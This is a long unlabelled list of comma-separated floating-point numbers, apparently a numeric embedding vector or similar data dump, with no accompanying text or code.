0.005369242746382952, -0.014572701416909695, 0.027134450152516365, -0.020364243537187576, -0.003086811862885952, 0.02844827249646187, 0.012467904947698116, 0.017897475510835648, 0.013862164691090584, 0.016369152814149857, 0.018742075189948082, 0.0050743031315505505, 0.02673226036131382, 0.02442636713385582, -0.001531675341539085, -0.008754345588386059, 0.019533051177859306, 0.034266628324985504, -0.017897475510835648, -0.022589698433876038, -0.01262878067791462, -0.048396918922662735, -0.018313072621822357, 0.02118203230202198, 0.009913994930684566, 0.04228362441062927, 0.03855666145682335, 0.015859710052609444, 0.0035996048245579004, 0.012159558944404125, -0.034078940749168396, -0.014693358913064003, -0.007306460291147232, -0.0006753448396921158, -0.008224795572459698, 0.03791315481066704, -0.011368583887815475, 0.002853876445442438, 0.02245563454926014, 0.014586107805371284, -0.023916926234960556, -0.02481515146791935, -0.007407007738947868, 0.0083856713026762, -0.003824161132797599, 0.018085164949297905, -0.036438457667827606, -0.01687859371304512, 0.035848576575517654, -0.02909177727997303, 0.013835351914167404, 0.0251771230250597, -0.02447999268770218, 0.03080778941512108, -0.0005362539668567479, 0.025579314678907394, -0.0057613784447312355, -0.030486037954688072, -0.027912018820643425, -0.01773660071194172, 0.004343657288700342, -0.003289582906290889, 0.001826615072786808, -0.006626088172197342, -0.001219139900058508, -0.009987729601562023, -0.007815901190042496, 0.00023419216449838132, 0.002071280963718891, -0.006636142730712891, 0.022267945110797882, 0.011060237884521484, -0.00341023993678391, 0.009927401319146156, -0.005412813276052475, 0.02276398055255413, 0.01929173618555069, 0.018366698175668716, 0.014867641031742096, -0.007943261414766312, 0.03702833503484726, -0.014948079362511635, 0.005097764078527689, 0.017253970727324486, -0.017884070053696632, 0.010309481993317604, -0.006311038974672556, 0.0040084985084831715, -0.0251771230250597, 0.016503214836120605, 0.02134290710091591, -0.0197073332965374, -0.02209366299211979, 0.005935661029070616, -0.001338121248409152, 0.00452464260160923, 0.007534367963671684, 0.009243677370250225, 0.00022371845261659473, 0.003589550033211708, -0.015604990534484386, -0.004950294271111488, 0.02750982902944088, -0.051534004509449005, 0.024721307680010796, -0.019197892397642136, 0.000541281362529844, 0.018473949283361435, -0.010416733101010323, -0.00024508481146767735, -0.007474039681255817, 0.018420323729515076, 0.010845736600458622, 0.02906496450304985, -0.013258879072964191, -0.00527539849281311, -0.007004817482084036, 0.02556590735912323, -0.017750006169080734, 0.02082006074488163, 0.001164676621556282, -0.002525421092286706, -0.005871980916708708, 0.004477720707654953, 0.012286919169127941, -0.0074673364870250225, 0.014532482251524925, 0.010074871592223644, -0.014840828254818916, 0.02756345458328724, -0.02759026549756527, 0.0033683450892567635, -0.021798724308609962, 0.006351257674396038, 0.010182121768593788, 0.008352155797183514, -0.007205912843346596, 0.0003856420225929469, -0.0032543912529945374, -0.027912018820643425, -0.012447794899344444, -0.020498307421803474, -0.007876230403780937, 0.015256425365805626, 0.005731214303523302, 0.03375718742609024, 0.01817900873720646, -0.016261901706457138, -0.005161444190889597, 0.023340454325079918, -0.02240200899541378, -0.011087050661444664, 0.013433162122964859, -0.010611125268042088, 0.00939785037189722, 0.014814015477895737, -0.0123405447229743, 0.009981026872992516, -0.0020813357550650835, -0.003452134784311056, -0.033328182995319366, 0.003951521590352058, -0.03273830562829971, -0.022884637117385864, 0.006341203115880489, 0.0011454049963504076, 0.020618963986635208, 0.007205912843346596, -0.010993205942213535, 0.016194868832826614, -0.012742734514176846, 0.0017294189892709255, 0.01998886652290821, 0.017200345173478127, 0.013158331625163555, -0.028716400265693665, -0.005493251606822014, -0.028770025819540024, -0.017615942284464836, 0.009558727033436298, -0.013332613743841648, -0.003068378195166588, -0.011442318558692932, -0.013051080517470837, 0.00687745725736022, 0.006176975555717945, 0.0048162308521568775, -0.04308800771832466, -0.005871980916708708, 0.010611125268042088, 0.007487446069717407, -0.000373283022781834, -0.010342998430132866, 0.0002563964226283133, -0.0006954543641768396, 0.02501624822616577, 0.01571224071085453, 0.016637278720736504, 0.005610557273030281, -0.005985934752970934, 0.017307596281170845, 0.014840828254818916, -0.0030432413332164288, -0.005530118942260742, -0.010061465203762054, 0.032523803412914276, -0.005734565667808056, -0.00682047987356782, 0.022442229092121124, 0.011851212941110134, -0.003011401044204831, 0.018393510952591896, -0.0197073332965374, -0.014277761802077293, -0.038985662162303925, -0.011764070950448513, 0.002079659840092063, 0.016918811947107315, -0.003797348355874419, 0.0033180713653564453, 0.012823172844946384, 0.002614238066598773, 0.0006041235756129026, -0.033301372081041336, -0.0034119158517569304, 0.009739712812006474, 0.012374060228466988, -0.0018953225808218122, -0.007132177706807852, 0.012400873005390167, -0.006776909343898296, -0.019827989861369133, -0.012293621897697449, -0.01965370774269104, -0.0002463416603859514, -0.01370128896087408, -0.026852916926145554, 0.01687859371304512, -0.007762276101857424, -0.00650207931175828, 0.024721307680010796, 0.0022790792863816023, -0.013185144402086735, 0.01734781637787819, 0.006022802088409662, 0.009223568253219128, 0.0049536461010575294, 0.002267348812893033, 0.004618487320840359, 0.013513599522411823, -0.0020746325608342886, 0.005727862473577261, -0.016503214836120605, -0.005935661029070616, -0.0034923539496958256, -0.002173504326492548, -0.001883591990917921, 0.02914540283381939, -0.0031404371839016676, 0.0038844896480441093, 0.04625190421938896, -0.010671453550457954, -0.028662774711847305, -0.007634915877133608, 0.008586766198277473, 0.0070852553471922874, -0.02393033355474472, 0.018608013167977333, 0.005828410387039185, 0.011898134835064411, -0.003472244367003441, -0.016221681609749794, 0.013218659907579422, 0.013272285461425781, -0.005868629086762667, -0.0009024148457683623, 0.017522098496556282, -0.010952986776828766, 0.015645209699869156, -0.02828739583492279, -0.009310709312558174, -0.02195959910750389, -0.019197892397642136, 0.020994342863559723, 0.007132177706807852, 0.031853485852479935, -0.005030732601881027, -0.018782295286655426, 0.02079324796795845, 0.006656252313405275, 0.020203368738293648, -0.03474925830960274, 0.007299757096916437, 0.043490197509527206, 0.011281442828476429, 0.02486877702176571, -0.005798245780169964, 0.03925378993153572, 0.018111977726221085, 0.00247011985629797, -0.025337999686598778, 0.008533141575753689, 0.008700720965862274, -0.029333092272281647, 0.02525756135582924, 0.0015819491818547249, -0.01124122366309166, 0.014385012909770012, 0.011006612330675125, -0.008633689023554325, 0.012307028286159039, 0.028555523604154587, -0.005939012859016657, -0.008204685524106026, 0.002339407801628113, 0.014371606521308422, -0.0011043479898944497, -0.011911541223526001, 0.0007700271671637893, -0.0028153331950306892, 0.01079881377518177, 0.02212047576904297, 0.013238769955933094, 0.011542866937816143, 0.020685996860265732, -0.013299098238348961, 0.020270399749279022, -0.00047341169556602836, -0.009954214096069336, 0.014720171689987183, -0.024453179910779, -0.011911541223526001, -0.0034923539496958256, -0.015444113872945309, 0.0011102132266387343, 0.004802824463695288, 0.007487446069717407, -0.0071522872895002365, -0.0021450158674269915, 0.018393510952591896, 0.00442074378952384, 0.008640391752123833, -0.002448334591463208, -0.003760481020435691, 0.018661638721823692, 0.009940807707607746, -0.003988388925790787, 0.003073405474424362, 0.016918811947107315, 0.017870662733912468, 0.010296076536178589, 0.014572701416909695, 0.0017243915935978293, 0.006374719087034464, -0.007889636792242527, 0.013862164691090584, -0.02331364154815674, 0.01823263429105282, 0.01581949181854725, -0.006016099359840155, 0.008003590628504753, 0.018272854387760162, -0.01374150812625885, 0.009753119200468063, 0.011697039939463139, 0.0030583234038203955, 0.0064484537579119205, 0.004786066710948944, 0.01801813393831253, -0.005979231558740139, -0.00945147592574358, 0.00916323997080326, -0.00289074401371181, -0.001059101545251906, 0.016369152814149857, 0.00048179065925069153, 0.009458179585635662, 0.009981026872992516, 0.010416733101010323, 0.004786066710948944, -0.018728669732809067, 0.008144357241690159, -0.01610102504491806, -0.01776341162621975, 0.02004249207675457, 0.00872753281146288, -0.01232713833451271, -0.01262878067791462, -0.023769456893205643, 0.009096208028495312, -0.00988047942519188, -0.005050842184573412, -0.011361881159245968, 0.015296644531190395, 0.004688870627433062, -0.011247927322983742, -0.00299129169434309, -0.021771911531686783, -0.012494717724621296, 0.004078881815075874, 0.016556840389966965, -0.008405780419707298, 0.016757937148213387, -0.017146719619631767, 0.0016908757388591766, -0.031746234744787216, 0.00469892518594861, 0.0026427265256643295, -0.0004910075222142041, -0.012863392010331154, -0.01374150812625885, -0.019278330728411674, -0.014317980967462063, 0.010369811207056046, -0.0021064726170152426, -0.017106501385569572, -0.0024047638289630413, -0.006699822843074799, -0.009927401319146156, 0.01335272379219532, 0.00032531344913877547, 0.00003275652852607891, -0.006609329953789711, 0.009270490147173405, -0.005060896743088961, -0.01078540738672018, 0.004142561927437782, 0.023192983120679855, 0.0006447616033256054, -0.005238530691713095, -0.002230481244623661, 0.03169260919094086, -0.023394079878926277, -0.012206480838358402, 0.0017428253777325153, 0.011884728446602821, -0.026303255930542946, 0.008486218750476837, -0.009679383598268032, 0.010329592041671276, -0.022200914099812508, 0.00041559681994840503, 0.01378172729164362, 0.002118203090503812, 0.021691473200917244, 0.01364095974713564, -0.013292395509779453, 0.009639165364205837, -0.025029653683304787, -0.02714785747230053, 0.008875003084540367, -0.03515144810080528, -0.011348474770784378, -0.011851212941110134, 0.016275307163596153, -0.0032962861005216837, -0.020913904532790184, -0.022911449894309044, -0.008265013806521893, 0.01732100360095501, -0.012809766456484795, 0.006870754063129425, 0.011006612330675125, 0.010510577820241451, 0.0005014812340959907, -0.004098991397768259, -0.008211389183998108, -0.009344225749373436, -0.0008789537823759019, 0.01620827615261078, 0.006830534897744656, 0.016114432364702225, -0.020565340295433998, -0.020283805206418037, 0.02826058305799961, -0.04542070999741554, 0.005516712553799152, -0.005841816775500774, 0.015068735927343369, 0.0073466794565320015, 0.020833466202020645, 0.0015903281746432185, 0.008908518590033054, -0.03295280784368515, 0.009619055315852165, -0.00670317467302084, 0.010182121768593788, 0.002892419695854187, -0.005429571494460106, 0.008734236471354961, 0.008204685524106026, -0.0026795940939337015, 0.007581290323287249, -0.004776011686772108, 0.003928060177713633, 0.028019269928336143, 0.008754345588386059, 0.007836011238396168, -0.001433641416952014, 0.01726737804710865, -0.005241882521659136, -0.02901133894920349, 0.002763383788987994, -0.009431366808712482, 0.005801597610116005, -0.013191847130656242, 0.030030222609639168, 0.0047525507397949696, -0.010624531656503677, 0.005154740996658802, 0.0037504262290894985, -0.009712900035083294, -0.0022455635480582714, -0.0065758139826357365, 0.008875003084540367, 0.02984253317117691, -0.01832647994160652, 0.0010247478494420648, -0.015953555703163147, -0.01296393945813179, -0.011442318558692932, -0.02551228180527687, 0.008258311077952385, 0.025378217920660973, -0.008151059970259666, -0.0009107938385568559, 0.00030855549266561866, 0.0012568451929837465, -0.013292395509779453, 0.007929855026304722, 0.006683065090328455, 0.0031588710844516754, 0.013493490405380726, 0.005560283083468676, 0.0014277761802077293, 0.029413530603051186, 0.018031539395451546, 0.005379297770559788, 0.001783044426701963, 0.009578836150467396, -0.030459225177764893, -0.022978482767939568, -0.019331954419612885, 0.006917675957083702, -0.0003646945988293737, -0.022133883088827133, 0.012789657339453697, 0.007004817482084036, 0.005453032441437244, 0.0000628422640147619, 0.0002050752518698573, 0.000334530312102288, 0.00884148757904768, -0.01264218706637621, -0.0045011816546320915, 0.009779931977391243, 0.011060237884521484, -0.008640391752123833, -0.004782714881002903, -0.004960349295288324, 0.0010012866696342826, 0.0015467575285583735, 0.004357063211500645, 0.010644640773534775, 0.005499954801052809, -0.004967052489519119, -0.003817457938566804, 0.012870094738900661, -0.025820627808570862, 0.016690904274582863, -0.0036565817426890135, -0.015470926649868488, 0.004450907930731773, -0.012689108960330486, 0.008761049248278141, 0.01742825284600258, 0.01770978793501854, -0.020498307421803474, 0.009974324144423008, -0.003509111935272813, -0.019466018304228783, -0.01859460584819317, 0.00939785037189722, -0.014277761802077293, -0.015189393423497677, 0.0014864288968965411, 0.008667204529047012, -0.027054011821746826, -0.0029695064295083284, 0.01254834234714508, -0.02279079332947731, -0.026088755577802658, -0.004548104014247656, 0.017414847388863564, 0.025726784020662308, 0.01257515512406826, 0.03641164302825928, 0.026504352688789368, -0.000017124515579780564, 0.013158331625163555, 0.005201663356274366, -0.02992297150194645, 0.006481969729065895, 0.0015350269386544824, 0.03067372739315033, -0.0009669329156167805, -0.005107819102704525, 0.003157195169478655, -0.008948737755417824, -0.00988047942519188, -0.003938115201890469, -0.014894453808665276, -0.031933922320604324, 0.005107819102704525, 0.003371696686372161, 0.010745189152657986, 0.005959121976047754, 0.006542298477143049, 0.02095412276685238, 0.008432593196630478, 0.014103478752076626, -0.004088936373591423, 0.008177872747182846, -0.0007524313405156136, 0.004357063211500645, 0.013848758302628994, -0.001235059928148985, -0.008875003084540367, 0.014854234643280506, 0.011857915669679642, -0.0014596162363886833, -0.022308165207505226, -0.04976436868309975, 0.006109943613409996, 0.006052966695278883, -0.004243109375238419, 0.006254062056541443, -0.01197857316583395, 0.00846610963344574, 0.004568213596940041, 0.038154467940330505, 0.0008848190191201866, -0.0038945444393903017, 0.0034688927698880434, 0.011663523502647877, -0.014116885140538216, 0.001292036846280098, 0.004279976710677147, 0.0070316302590072155, -0.008895112201571465, 0.008358858525753021, 0.005959121976047754, 0.013077893294394016, -0.03196073696017265, 0.019667113199830055, 0.0188493262976408, -0.0022472392302006483, -0.008948737755417824, 0.007903043180704117, -0.0012048956705257297, 0.004477720707654953, 0.01876888796687126, 0.00917664635926485, -0.0001890504645416513, 0.0013565549161285162, -0.010597718879580498, -0.0013330938527360559, 0.014814015477895737, 0.001077535329386592, -0.007313163485378027, -0.012394169345498085, 0.007728760130703449, 0.018634825944900513, -0.005721159279346466, -0.0013909087283536792, 0.00001974294355022721, -0.016583653166890144, 0.003974982537329197, 0.006481969729065895, -0.003911302424967289, -0.039575543254613876, 0.03700152412056923, 0.012762844562530518, -0.003780590370297432, -0.0029963189736008644, 0.026866324245929718, 0.015953555703163147, -0.0006355447112582624, -0.007286350708454847, 0.0017227159114554524, 0.019063828513026237, -0.019331954419612885, 0.010135199874639511, -0.018554387614130974, -0.033354997634887695, 0.014612920582294464, 0.0013154980260878801, -0.027161262929439545, -0.006673010066151619, 0.004286679904907942, -0.00689086364582181, -0.026276445016264915, -0.01024245098233223, 0.005717807915061712, -0.023005295544862747, 0.019975459203124046, 0.015873117372393608, 0.008807971142232418, 0.005922254640609026, -0.007996886968612671, -0.008097434416413307, -0.009183349087834358, -0.007514258846640587, -0.006931082345545292, -0.0027298678178340197, -0.007172396872192621, -0.003907950595021248, 0.01693221926689148, 0.01193835400044918, 0.013466677628457546, -0.009719602763652802, -0.00845270324498415, 0.015229612588882446, 0.013446568511426449, 0.02839464694261551, 0.026906542479991913, 0.04193506017327309, 0.011127269826829433, 0.007018223870545626, 0.025699971243739128, 0.004373821429908276, -0.00807732529938221, -0.010644640773534775, 0.01832647994160652, -0.009632461704313755, -0.010423436760902405, 0.02037765085697174, 0.0008395726326853037, -0.01859460584819317, -0.005218421574681997, -0.01934536173939705, -0.006347906310111284, -0.019398987293243408, -0.006451805587857962, 0.01332591101527214, 0.021745098754763603, -0.0012157883029431105, 0.004776011686772108, 0.013513599522411823, -0.019492831081151962, -0.007601399905979633, 0.0016481430502608418, -0.0055837444961071014, 0.009009066969156265, -0.021021155640482903, 0.010718376375734806, -0.0035057603381574154, 0.01779022440314293, -0.0066529009491205215, 0.01016201265156269, -0.022938262671232224, -0.0025656400248408318, -0.018675044178962708, -0.0034621895756572485, 0.013513599522411823, -0.009733009152114391, -0.024922402575612068, 0.03402531519532204, 0.022361790761351585, 0.0161814633756876, 0.008580063469707966, -0.014291168190538883, 0.0022137234918773174, 0.021691473200917244, 0.012400873005390167, 0.023997364565730095, 0.005871980916708708, -0.0052050151862204075, -0.00013552981545217335, -0.006267467979341745, -0.019090641289949417, 0.0025220694951713085, -0.012729328125715256, 0.0011009963927790523, 0.020551932975649834, 0.005201663356274366, -0.016355745494365692, 0.013600741513073444, -0.006709877867251635, -0.014519075863063335, -0.000976987648755312, -0.01371469534933567, 0.003056647488847375, -0.008687314577400684, -0.01895657740533352, 0.015551364980638027, 0.00043947689118795097, 0.008935331366956234, 0.00019104046805296093, 0.025498876348137856, 0.010222340933978558, -0.007279647514224052, -0.026490945369005203, 0.012622077949345112, 0.017615942284464836, -0.016891999170184135, 0.011167488992214203, -0.020256994292140007, 0.00016789358051028103, 0.003974982537329197, 0.00280360272154212, 0.007641619071364403, 0.013567225076258183, -0.003817457938566804, 0.0005144686438143253, -0.017146719619631767, -0.013969415798783302, -0.014344793744385242, -0.014197323471307755, -0.007293053902685642, 0.019385579973459244, -0.010101684369146824, 0.02717467024922371, 0.010725079104304314, -0.0021249062847346067, -0.03150492161512375, 0.004414040595293045, 0.01301756501197815, 0.0061401077546179295, -0.011690336279571056, 0.01742825284600258, -0.001694227335974574, 0.025914473459124565, 0.010141902603209019, -0.009712900035083294, 0.006971301510930061, 0.016342340037226677, -0.0020059249363839626, -0.01020223181694746, 0.018313072621822357, -0.01081222016364336, -0.0009309033630415797, 0.0225092601031065, 0.002726516220718622, -0.009598946198821068, -0.014505669474601746, -0.030915040522813797, -0.011569678783416748, 0.0027751142624765635, -0.00022560371144209057, -0.02185234986245632, 0.004011849872767925, 0.006290929391980171, -0.010034652426838875, 0.003282879712060094, -0.011583085171878338, 0.007259537931531668, 0.014948079362511635, 0.009431366808712482, 0.002860579639673233, 0.021007748320698738, 0.008921924978494644, 0.016664091497659683, 0.00279019633308053, -0.008533141575753689, -0.008586766198277473, -0.035124633461236954, 0.00019093573791906238, 0.007192506454885006, -0.0027499774005264044, -0.001495645847171545, 0.005422868300229311, -0.014371606521308422, -0.006093185860663652, 0.017414847388863564, -0.019117454066872597, -0.024466587230563164, -0.017039470374584198, 0.004122452344745398, 0.00982685387134552, -0.015417301096022129, 0.011810993775725365, 0.010410030372440815, 0.010765298269689083, -0.023769456893205643, -0.003157195169478655, -0.0009376065572723746, 0.0016674146754667163, -0.03383762389421463, -0.013332613743841648, 0.0036264173686504364, -0.0372428372502327, -0.0022824308834969997, -0.0036364721599966288, 0.016583653166890144, 0.0011001585517078638, 0.013862164691090584, 0.024466587230563164, 0.0008085704175755382, 0.006944488734006882, -0.0007222670828923583, 0.007138880901038647, 0.02009611763060093, -0.00907609798014164, -0.009940807707607746, -0.007112068124115467, -0.005007271189242601, -0.01662387326359749, -0.007929855026304722, 0.00007761019514873624, 0.004876559600234032, -0.019278330728411674, -0.01607421226799488, -0.00306335068307817, 0.004869856406003237, -0.0014579404378309846, 0.010658047161996365, -0.006200436502695084, 0.001196516677737236, 0.029547592625021935, 0.0034052126575261354, 0.009974324144423008, -0.011851212941110134, 0.021825537085533142, -0.02403758466243744, -0.015015111304819584, -0.00650207931175828, 0.010041355155408382, 0.01856779307126999, 0.010034652426838875, -0.02714785747230053, -0.0006866564508527517, -0.006187030114233494, 0.02728191949427128, -0.010262560099363327, -0.001326390658505261, -0.012910313904285431, -0.024158241227269173, 0.0005375107866711915, -0.012206480838358402, 0.006468563340604305, -0.009009066969156265, 0.009846962988376617, 0.004832988604903221, -0.0011822724482044578, 0.006535595282912254, 0.03375718742609024, -0.009169942699372768, 0.018058352172374725, 0.003817457938566804, -0.002242211950942874, 0.015484333038330078, 0.007460633292794228, 0.019693925976753235, -0.01685178093612194, 0.013453271239995956, -0.006321093533188105, 0.0066495491191744804, 0.01018882542848587, -0.0033046649768948555, -0.0023511385079473257, 0.00043780109263025224, -0.006485321559011936, -0.0055770413018763065, 0.007929855026304722, -0.007970074191689491, 0.039709605276584625, -0.0098536666482687, 0.00236957217566669, 0.024211866781115532, 0.01235395111143589, 0.019613489508628845, 0.00916323997080326, 0.013386239297688007, -0.009974324144423008, 0.009096208028495312, -0.008995660580694675, -0.006257413420826197, 0.0040453658439219, -0.010128497146070004, 0.01726737804710865, -0.0008873327169567347, -0.004789418075233698, -0.008620282635092735, 0.0028237123042345047, -0.020176555961370468, 0.02745620347559452, 0.013540412299335003, -0.00030583233456127346, -0.00807732529938221, -0.029359905049204826, 0.0005241044564172626, 0.006032857112586498, -0.023528141900897026, 0.005104467272758484, -0.022857824340462685, 0.005838464945554733, 0.024976028129458427, -0.012997454963624477, 0.0027935479301959276, -0.023380672559142113, -0.0058183553628623486, -0.016677498817443848, -0.0014009635196998715, -0.0024299006909132004, -0.014921266585588455, 0.01757572405040264, -0.009940807707607746, -0.020753027871251106, -0.026155786588788033, -0.005546876695007086, -0.0063277967274188995, -0.006344554480165243, 0.020592153072357178, -0.040567610412836075, -0.007453930098563433, 0.001876888913102448, -0.009686087258160114, 0.02162444032728672, 0.006709877867251635, 0.010262560099363327, -0.013466677628457546, 0.006622736342251301, 0.0017713138367980719, -0.018581200391054153, 0.000012018582310702186, -0.00981344748288393, -0.0033046649768948555, -0.017562316730618477, -0.034213002771139145, -0.012521529570221901, 0.01083903294056654, 0.0035225183237344027, -0.00001493812942499062, -0.004675464238971472, -0.0012266809353604913, -0.008633689023554325, 0.029252653941512108, -0.0016112755984067917, 0.027389170601963997, 0.009699493646621704, 0.0066428459249436855, -0.012400873005390167, -0.0037772387731820345, 0.0027600321918725967, 0.0010255856905132532, 0.017334409058094025, 0.005499954801052809, -0.009927401319146156, 0.0023109193425625563, -0.010872549377381802, -0.006840589456260204, -0.010906064882874489, -0.0010884279618039727, -0.007219318766146898, 0.01087925210595131, 0.02157081477344036, 0.016556840389966965, 0.004789418075233698, -0.02009611763060093, 0.011073644272983074, 0.007259537931531668, 0.0035426276735961437, 0.00559379905462265, 0.006176975555717945, -0.003676691325381398, 0.0014051529578864574, 0.009210161864757538, -0.01301756501197815, -0.00560720544308424, 0.009471585974097252, -0.007567883934825659, 0.012742734514176846, -0.008580063469707966, 0.00988047942519188, 0.008164466358721256, -0.011361881159245968, 0.02128928154706955, -0.02512349747121334, -0.010952986776828766, 0.006619384977966547, -0.012896907515823841, 0.0015308375004678965, 0.03145129606127739, -0.021275876089930534, -0.0017344463849440217, -0.0034688927698880434, -0.007956667803227901, -0.015417301096022129, -0.012863392010331154, -0.021114999428391457, 0.008908518590033054, 0.008164466358721256, 0.024935809895396233, 0.0043704695999622345, 0.010027948766946793, 0.003904599230736494, 0.0064015318639576435, 0.01219977717846632, 0.009015769697725773, -0.008640391752123833, -0.006130053196102381, -0.006324445363134146, -0.0032007659319788218, 0.005084357690066099, -0.008378968574106693, 0.007909745909273624, 0.0017595833633095026, 0.0039917402900755405, 0.026102161034941673, -0.0063914768397808075, -0.005017326213419437, 0.005258640274405479, 0.00687745725736022, 0.011294849216938019, 0.010872549377381802, -0.000589041446801275, -0.012407575733959675, -0.004115749150514603, 0.018835920840501785, -0.006562408059835434, 0.01537708193063736, -0.00010311367805115879, -0.000780919857788831, 0.0055770413018763065, 0.003105245530605316, -0.007567883934825659, 0.003199090017005801, 0.00687745725736022, -0.0061334045603871346, -0.002465092344209552, 0.004209593404084444, 0.015350270085036755, -0.019023608416318893, 0.012052307836711407, 0.009290600195527077, 0.013225363567471504, -0.008968847803771496, -0.005027380771934986, -0.012668999843299389, 0.006743393372744322, -0.0031203278340399265, -0.0015224585076794028, -0.004507884848862886, -0.01890295185148716, 0.015645209699869156, -0.008573359809815884, 0.021664660423994064, -0.009042582474648952, -0.0045749167911708355, 0.001920459559187293, -0.015645209699869156, -0.003767183981835842, 0.01799132116138935, -0.0037202618550509214, 0.033328182995319366, -0.01254834234714508, -0.005154740996658802, -0.014438637532293797, 0.007138880901038647, -0.003904599230736494, -0.01765616238117218, 0.022562885656952858, 0.0014755362644791603, 0.009940807707607746, 0.002709758235141635, -0.022334977984428406, -0.008647095412015915, 0.029520779848098755, 0.004098991397768259, -0.011475834995508194, 0.02201322466135025, -0.008559953421354294, -0.006414938252419233, 0.008613578975200653, 0.01960008218884468, 0.005442977882921696, -0.00527539849281311, -0.0017796928295865655, -0.003225902793928981, -0.022187506780028343, 0.016556840389966965, 0.030941853299736977, -0.03233611211180687, 0.010986503213644028, -0.005493251606822014, -0.001237573567777872, 0.003489002352580428, 0.004896669182926416, -0.01576586626470089, 0.0014788878615945578, -0.010745189152657986, 0.001653170445933938, 0.0012568451929837465, 0.011026722379028797, 0.0034755959641188383, 0.01121441088616848, -0.009169942699372768, 0.005875332280993462, 0.006709877867251635, -0.004353711847215891, 0.03075416386127472, -0.0029778853058815002, 0.003219199599698186, -0.014948079362511635, 0.0018785647116601467, -0.005546876695007086, -0.008016997016966343, -0.012119339779019356, 0.0058250585570931435, -0.006984707899391651, 0.013614147901535034, 0.007956667803227901, 0.012769547291100025, -0.0023209741339087486, -0.012896907515823841, -0.024976028129458427, -0.006612681783735752, 0.008459405973553658, 0.010503874160349369, 0.0073936013504862785, -0.027214888483285904, 0.012541639618575573, 0.0012107609072700143, -0.008378968574106693, 0.001531675341539085, 0.017079688608646393, -0.0005349970888346434, 0.009250381030142307, -0.017280783504247665, 0.010356404818594456, 0.027831580489873886, -0.018286259844899178, 0.018500762060284615, 0.020967530086636543, -0.03241655230522156, 0.014304574579000473, 0.006331148557364941, 0.004450907930731773, 0.010872549377381802, -0.013996228575706482, 0.0008797916816547513, 0.0122265899553895, -0.02820695750415325, 0.01193835400044918, 0.009009066969156265, -0.017307596281170845, 0.00192213524132967, 0.012320434674620628, -0.0014713468262925744, 0.011073644272983074, 0.023742644116282463, 0.0006007720367051661, 0.00938444398343563, -0.011107159778475761, -0.025887660682201385, 0.0080907316878438, -0.009692789986729622, -0.009417960420250893, -0.0024533618707209826, -0.01640937104821205, 0.020189961418509483, -0.017039470374584198, 0.0009250380680896342, -0.026852916926145554, 0.005791542585939169, -0.01565861515700817, -0.016168056055903435, -0.010885955765843391, -0.01257515512406826, 0.010678157210350037, -0.009612352587282658, 0.00244330707937479, -0.0024667682591825724, 0.018755482509732246, -0.013620850630104542, 0.009739712812006474, -0.03233611211180687, -0.0009803392458707094, -0.004652003291994333, -0.04099661484360695, 0.007929855026304722, -0.010128497146070004, -0.015108955092728138, -0.004672112874686718, -0.00843929685652256, 0.005238530691713095, -0.022750575095415115, -0.01721375249326229, 0.0028555523604154587, -0.00880126841366291, -0.006146810948848724, 0.009927401319146156, -0.001808181288652122, 0.006984707899391651, -0.025780409574508667, -0.0057044015266001225, -0.00384427048265934, -0.0021081482991576195, 0.017535503953695297, 0.0030398897361010313, 0.0040017953142523766, 0.016382558271288872, 0.0023712480906397104, 0.0040017953142523766, -0.003924708813428879, 0.007641619071364403, 0.023112546652555466, -0.023273421451449394, -0.0070316302590072155, 0.019331954419612885, -0.001858455128967762, 0.0035493308678269386, -0.019948648288846016, -0.00803710613399744, 0.016717717051506042, -0.003954872954636812, 0.019479425624012947, -0.012427685782313347, 0.005412813276052475, 0.0009828530019149184, 0.027777954936027527, -0.012038901448249817, 0.0010096656624227762, 0.02053852751851082, -0.005533470772206783, 0.002545530442148447, -0.0015945176128298044, -0.012970643118023872, 0.014023041352629662, -0.00045330217108130455, -0.008834783919155598, 0.00491342693567276, 0.001673279912211001, -0.006451805587857962, 0.018313072621822357, 0.00845270324498415, -0.02606194280087948, -0.001838345662690699, -0.001417721388861537, 0.006173623725771904, -0.014626326970756054, 0.013319207355380058, -0.003225902793928981, 0.009665977209806442, -0.010423436760902405, -0.008613578975200653, -0.0006422479054890573, -0.008177872747182846, -0.0025287726894021034, -0.009203458204865456, 0.02209366299211979, 0.02989615872502327, -0.015243018977344036, -0.010671453550457954, 0.002463416662067175, -0.04029948636889458, 0.0010716699762269855, -0.020806653425097466, -0.013547115959227085, 0.008513031527400017, 0.008908518590033054, -0.01968052051961422, 0.008499625138938427, -0.0259010661393404, 0.002111499896273017, 0.007990184240043163, 0.00255726114846766, -0.007091958541423082, -0.017495285719633102, -0.0025622884277254343, -0.001992518547922373, -0.0000217722244997276, -0.008419186808168888, -0.011737258173525333, -0.03753777593374252, 0.00017690096865408123, 0.00323763326741755, 0.006244007032364607, -0.010725079104304314, 0.00026226171758025885, -0.017951101064682007, -0.019023608416318893, -0.03936104103922844, 0.011683633551001549, 0.015229612588882446, 0.019640302285552025, -0.0005618098075501621, 0.027885206043720245, 0.01153616327792406, -0.021074781194329262, 0.00907609798014164, -0.015015111304819584, 0.023836487904191017, -0.010249153710901737, -0.004125803709030151, -0.023045513778924942, 0.018004726618528366, 0.0027935479301959276, -0.0024852019269019365, 0.003509111935272813, -0.0068271830677986145, 0.013527005910873413, 0.0042598675936460495, 0.0009652571170590818, -0.0031303823925554752, 0.01378172729164362, -0.0036565817426890135, 0.0055200643837451935, 0.01092617493122816, -0.00872753281146288, 0.014612920582294464, -0.001591166015714407, 0.01657024770975113, -0.00010756500705610961, 0.013265582732856274, 0.03544638678431511, 0.007373491767793894, 0.0274830162525177, 0.005791542585939169, -0.01998886652290821, 0.003400185378268361, 0.016007181257009506, -0.005865277722477913, 0.027442796155810356, 0.006190381478518248, 0.025498876348137856, -0.00236957217566669, 0.0008429241715930402, -0.0016933894949033856, -0.016261901706457138, -0.011408803053200245, -0.022174101322889328, -0.009196755476295948, 0.003519166726619005, -0.007655025459825993, 0.01607421226799488, 0.011697039939463139, -0.00650207931175828, -0.020699402317404747, -0.007407007738947868, -0.008318639360368252, 0.035071007907390594, 0.0015702185919508338, -0.008345452137291431, 0.012072416953742504, 0.03641164302825928, 0.0031303823925554752, -0.017052875831723213, 0.0028253879863768816, 0.022308165207505226, 0.005758027080446482, 0.00421964842826128, -0.01998886652290821, 0.004846394993364811, 0.003881138050928712, 0.0019321900326758623, -0.011455724947154522, 0.02356836199760437, 0.028046082705259323, 0.005985934752970934, -0.01701265759766102, 0.012132746167480946, 0.02600831724703312, 0.013808539137244225, 0.005493251606822014, 0.010517280548810959, 0.00988047942519188, -0.0020260345190763474, 0.0017227159114554524, 0.008982254192233086, 0.009216864593327045, 0.028850462287664413, 0.006592572201043367, 0.025767002254724503, 